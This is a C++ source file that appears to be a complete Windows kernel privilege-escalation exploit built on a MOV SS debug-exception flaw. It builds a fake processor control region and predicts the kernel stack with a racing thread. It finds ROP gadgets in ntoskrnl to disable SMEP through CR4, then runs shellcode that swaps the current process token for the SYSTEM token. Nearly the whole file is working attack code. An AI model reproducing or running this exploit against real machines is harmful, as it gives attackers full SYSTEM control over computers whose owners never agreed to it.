#include <iostream>
#include <Windows.h>
#include <intrin.h>
#include "KernelRoutines.h"
#include "LockedMemory.h"
#include "Native.h"
#include "Error.h"
#include "Exploit.h"

struct ISR_STACK
{
	uint64_t RIP;
	uint64_t CS;
	uint64_t EF;
	uint64_t RSP;
};

// Doensn't really change
static const uint32_t Offset_Pcr__Self = 0x18;
static const uint32_t Offset_Pcr__CurrentPrcb = 0x20;
static const uint32_t Offset_Pcr__Prcb = 0x180;
static const uint32_t Offset_Prcb__CurrentThread = 0x8;
static const uint32_t Offset_Context__XMM13 = 0x270;
static const uint32_t MxCsr__DefVal = 0x1F80;
static const uint32_t Offset_Prcb__RspBase = 0x28;
static const uint32_t Offset_KThread__InitialStack = 0x28;
static const uint32_t Offset_Prcb__Cr8 = 0x100 + 0xA0;
static const uint32_t Offset_Prcb__Cr4 = 0x100 + 0x18;

// Requires patterns
NON_PAGED_DATA static uint32_t Offset_Prcb__Context = 0x0;                   // @KeBugCheckEx
NON_PAGED_DATA static uint32_t Offset_KThread__ApcStateFill__Process = 0x0;  // @PsGetCurrentProcess

NON_PAGED_DATA uint64_t ContextBackup[10];

NON_PAGED_DATA fnFreeCall k_PsDereferencePrimaryToken = 0;
NON_PAGED_DATA fnFreeCall k_PsReferencePrimaryToken = 0;
NON_PAGED_DATA fnFreeCall k_PsGetCurrentProcess = 0;
NON_PAGED_DATA uint64_t* k_PsInitialSystemProcess = 0;

NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0;

using fnIRetToVulnStub = void(*)(uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup);
NON_PAGED_DATA BYTE IRetToVulnStub[] =
{
	0x0F, 0x22, 0xE1,		// mov cr4, rcx ; cr4 = original cr4
	0x48, 0x89, 0xD4,		// mov rsp, rdx ; stack = isr stack
	0x4C, 0x89, 0xC1,		// mov rcx, r8  ; rcx = ContextBackup
	0xFB,				// sti          ; enable interrupts
	0x48, 0x31, 0xC0,               // xor rax, rax ; lower irql to passive_level 
	0x44, 0x0F, 0x22, 0xC0,         // mov cr8, rax
	0x48, 0xCF			// iretq        ; interrupt return
};

NON_PAGED_DATA uint64_t PredictedNextRsp = 0;
NON_PAGED_DATA ptrdiff_t StackDelta = 0;

NON_PAGED_CODE void KernelShellcode()
{
	__writedr(7, 0);

	uint64_t Cr4Old = __readgsqword(Offset_Pcr__Prcb + Offset_Prcb__Cr4);
	__writecr4(Cr4Old & ~(1 << 20));

	__swapgs();

	// Uncomment if it bugchecks to debug:
	// __writedr( 2, StackDelta );
	// __writedr( 3, PredictedNextRsp );
	// __debugbreak();
	// ^ This will let you see StackDelta and RSP clearly in a crash dump so you can check where the process went bad

	uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38;

	// Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault
	while (
		((ISR_STACK*)IsrStackIterator)->CS == 0x10 &&
		((ISR_STACK*)IsrStackIterator)->RIP > 0x7FFFFFFEFFFF)
	{

		__rollback_isr(IsrStackIterator);

		// We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta
		if (((ISR_STACK*)(IsrStackIterator + 0x30))->CS == 0x33)
		{
			/*
			fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap
			fffff00e`d7a1bc40 0000000000000010
			fffff00e`d7a1bc48 0000000000000002
			fffff00e`d7a1bc50 fffff00ed7a1bc68
			fffff00e`d7a1bc58 0000000000000000
			fffff00e`d7a1bc60 0000000000000014
			fffff00e`d7a1bc68 00007ff7e2261e95 --
			fffff00e`d7a1bc70 0000000000000033
			fffff00e`d7a1bc78 0000000000000202
			fffff00e`d7a1bc80 000000ad39b6f938
			*/
			IsrStackIterator = IsrStackIterator + 0x30;
			break;
		}

		IsrStackIterator -= StackDelta;
	}


	PVOID KStub = (PVOID)k_ExAllocatePool(0ull, (uint64_t)sizeof(IRetToVulnStub));
	Np_memcpy(KStub, IRetToVulnStub, sizeof(IRetToVulnStub));

	// ------ KERNEL CODE ------

	uint64_t SystemProcess = *k_PsInitialSystemProcess;
	uint64_t CurrentProcess = k_PsGetCurrentProcess();

	uint64_t CurrentToken = k_PsReferencePrimaryToken(CurrentProcess);
	uint64_t SystemToken = k_PsReferencePrimaryToken(SystemProcess);

	for (int i = 0; i < 0x500; i += 0x8)
	{
		uint64_t Member = *(uint64_t *)(CurrentProcess + i);

		if ((Member & ~0xF) == CurrentToken)
		{
			*(uint64_t *)(CurrentProcess + i) = SystemToken;
			break;
		}
	}


	k_PsDereferencePrimaryToken(CurrentToken);
	k_PsDereferencePrimaryToken(SystemToken);

	// ------ KERNEL CODE ------

	__swapgs();

	((ISR_STACK*)IsrStackIterator)->RIP += 1;
	(fnIRetToVulnStub(KStub))(Cr4Old, IsrStackIterator, ContextBackup);
}

PUCHAR AllocateLockedMemoryForKernel(SIZE_T Sz)
{
	PUCHAR Va = (PUCHAR)VirtualAlloc(0, Sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	ZeroMemory(Va, Sz);
	for (int i = 0; i < Sz; i += 0x1000)
		Np_TryLockPage(Va + i);
	return Va;
}

void PrivEsc()
{
	// Pre-init checks: KVA Shadow
	SYSTEM_KERNEL_VA_SHADOW_INFORMATION KvaInfo = { 0 };
	if (!NtQuerySystemInformation(SystemKernelVaShadowInformation, &KvaInfo, (uint64_t) sizeof(KvaInfo), 0ull))
		assert(!KvaInfo.KvaShadowFlags.KvaShadowEnabled);

	// Initialization: Memory allocation, locking sections, loading nt

	assert(Np_LockSections());
	assert(Np_TryLockPage(&__rollback_isr));
	assert(Np_TryLockPage(&__swapgs));

	KernelContext* KrCtx = Kr_InitContext();
	assert(KrCtx);

	static PUCHAR Pcr = AllocateLockedMemoryForKernel(0x10000);
	static PUCHAR KThread = AllocateLockedMemoryForKernel(0x10000);
	static PUCHAR KProcess = AllocateLockedMemoryForKernel(0x10000);
	static PUCHAR Prcb = Pcr + Offset_Pcr__Prcb;


	// Offsets: Finding offsets and ROP gadgets

	PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)KrCtx->NtLib;
	PIMAGE_NT_HEADERS FileHeader = (PIMAGE_NT_HEADERS)((uint64_t)DosHeader + DosHeader->e_lfanew);
	PIMAGE_SECTION_HEADER SectionHeader = (PIMAGE_SECTION_HEADER)(((uint64_t)&FileHeader->OptionalHeader) + FileHeader->FileHeader.SizeOfOptionalHeader);
	while (_strcmpi((char*)SectionHeader->Name, ".text")) SectionHeader++;

	uint64_t AdrRetn = 0;
	uint64_t AdrPopRcxRetn = 0;
	uint64_t AdrSetCr4Retn = 0;

	PUCHAR NtBegin = (PUCHAR)KrCtx->NtLib + SectionHeader->VirtualAddress;
	PUCHAR NtEnd = NtBegin + SectionHeader->Misc.VirtualSize;

	// Find [RETN]
	for (PUCHAR It = NtBegin; It < NtEnd; It++)
	{
		if (It[0] == 0xC3)
		{
			AdrRetn = It - (PUCHAR)KrCtx->NtLib + KrCtx->NtBase;
			break;
		}
	}

	// Find [POP RCX; RETN]
	for (PUCHAR It = NtBegin; It < NtEnd; It++)
	{
		if (It[0] == 0x59 && It[1] == 0xC3)
		{
			AdrPopRcxRetn = It - (PUCHAR)KrCtx->NtLib + KrCtx->NtBase;
			break;
		}
	}

	// Find [MOV CR4, RCX; RETN]
	for (PUCHAR It = NtBegin; It < NtEnd; It++)
	{
		if (It[0] == 0x0F && It[1] == 0x22 &&
			It[2] == 0xE1 && It[3] == 0xC3)
		{
			AdrSetCr4Retn = It - (PUCHAR)KrCtx->NtLib + KrCtx->NtBase;
			break;
		}
	}

	assert(AdrRetn);
	assert(AdrPopRcxRetn);
	assert(AdrSetCr4Retn);

	PUCHAR UPsGetCurrentProcess = (PUCHAR)GetProcAddress(KrCtx->NtLib, "PsGetCurrentProcess");
	PUCHAR UKeBugCheckEx = (PUCHAR)GetProcAddress(KrCtx->NtLib, "KeBugCheckEx");

	for (int i = 0; i < 0x50; i++)
	{
		if (UKeBugCheckEx[i] == 0x48 && UKeBugCheckEx[i + 1] == 0x8B &&  // mov rax, 
			UKeBugCheckEx[i + 7] == 0xE8)                             // call
		{
			Offset_Prcb__Context = *(int32_t *)(UKeBugCheckEx + i + 3);
			break;
		}
	}

	for (int i = 0; i < 0x50; i++)
	{
		if (UPsGetCurrentProcess[i] == 0x48 && UPsGetCurrentProcess[i + 1] == 0x8B &&  // mov rax, 
			UPsGetCurrentProcess[i + 7] == 0xC3)                                    // retn
		{
			Offset_KThread__ApcStateFill__Process = *(int32_t *)(UPsGetCurrentProcess + i + 3);
			break;
		}
	}

	assert(Offset_Prcb__Context);
	assert(Offset_KThread__ApcStateFill__Process);

	*(PVOID*)(Pcr + Offset_Pcr__Self) = Pcr;				// Pcr.Self
	*(PVOID*)(Pcr + Offset_Pcr__CurrentPrcb) = Pcr + Offset_Pcr__Prcb;	// Pcr.CurrentPrcb
	*(DWORD*)(Prcb) = MxCsr__DefVal;		// Prcb.MxCsr
	*(PVOID*)(Prcb + Offset_Prcb__CurrentThread) = KThread;			// Prcb.CurrentThread
	*(PVOID*)(Prcb + Offset_Prcb__Context) = Prcb + 0x3000;		// Prcb.Context, Placeholder
	*(PVOID*)(KThread + Offset_KThread__ApcStateFill__Process) = KProcess;			// EThread.ApcStateFill.EProcess
	*(PVOID*)(Prcb + Offset_Prcb__RspBase) = (PVOID)1;			// Prcb.RspBase
	*(PVOID*)(KThread + Offset_KThread__InitialStack) = 0;				// EThread.InitialStack

	NON_PAGED_DATA static DWORD SavedSS = __readss();

	// Execute Exploit!

	HANDLE ThreadHandle = CreateThread(0, 0, [](LPVOID) -> DWORD
	{
		volatile PCONTEXT Ctx = *(volatile PCONTEXT*)(Prcb + Offset_Prcb__Context);

		while (!Ctx->Rsp);						// Wait for RtlCaptureContext to be called once so we get leaked RSP
		uint64_t StackInitial = Ctx->Rsp;
		while (Ctx->Rsp == StackInitial);				// Wait for it to be called another time so we get the stack pointer difference 
		// between sequential KiDebugTrapOrFault's
		StackDelta = Ctx->Rsp - StackInitial;
		PredictedNextRsp = Ctx->Rsp + StackDelta;			// Predict next RSP value when RtlCaptureContext is called
		uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8;		// Predict where the return pointer will be located at
		NextRetPtrStorage &= ~0xF;
		*(uint64_t*)(Prcb + Offset_Prcb__Context) = NextRetPtrStorage - Offset_Context__XMM13;
		// Make RtlCaptureContext write XMM13-XMM15 over it
		return 0;
	}, 0, 0, 0);

	assert(ThreadHandle);

	assert(SetThreadPriority(ThreadHandle, THREAD_PRIORITY_TIME_CRITICAL));
	SetThreadAffinityMask(ThreadHandle, 0xFFFFFFFE);
	SetThreadAffinityMask(HANDLE(-2), 0x00000001);

	k_ExAllocatePool = KrCtx->GetProcAddress<>("ExAllocatePool");
	k_PsReferencePrimaryToken = KrCtx->GetProcAddress<>("PsReferencePrimaryToken");
	k_PsDereferencePrimaryToken = KrCtx->GetProcAddress<>("PsDereferencePrimaryToken");
	k_PsGetCurrentProcess = KrCtx->GetProcAddress<>("PsGetCurrentProcess");
	k_PsInitialSystemProcess = KrCtx->GetProcAddress<uint64_t*>("PsInitialSystemProcess");

	//Force proper execution order?  If you leave this out, the computer can BSoD.
	Sleep(1000);

	CONTEXT Ctx = { 0 };
	Ctx.Dr0 = (uint64_t)&SavedSS;                        	// Trap SS
	Ctx.Dr1 = (uint64_t)Prcb + Offset_Prcb__Cr8;         	// Trap KiSaveProcessorControlState, Cr8 storage
	Ctx.Dr7 =
		(1 << 0) | (3 << 16) | (3 << 18) |	// R/W, 4 Bytes, Active
		(1 << 2) | (3 << 20) | (2 << 22);		// W,   8 Bytes,  Active
	Ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;

	assert(SetThreadContext(HANDLE(-2), &Ctx));

	uint64_t RetnRetn[2] = { AdrRetn, AdrRetn };
	uint64_t PopRcxRetnRcx[2] = { AdrPopRcxRetn, 0x506f8 };
	uint64_t SetCr4Retn[2] = { AdrSetCr4Retn, (uint64_t)&KernelShellcode };

	// RSP:
	__setxmm13((BYTE*)RetnRetn);		// &retn	// we need to align xmm writes so two place holders just incase!
	// &retn
	__setxmm14((BYTE*)PopRcxRetnRcx);		// &pop rcx
	// 0x506f8
	__setxmm15((BYTE*)SetCr4Retn);		// &mov cr4, rcx; retn
	// &KernelShellcode

	PVOID ProperGsBase = __read_gs_base();
	__set_gs_base(Pcr);
	__triggervuln(ContextBackup, &SavedSS); // Let the fun begin
	__set_gs_base(ProperGsBase);
	return;
}
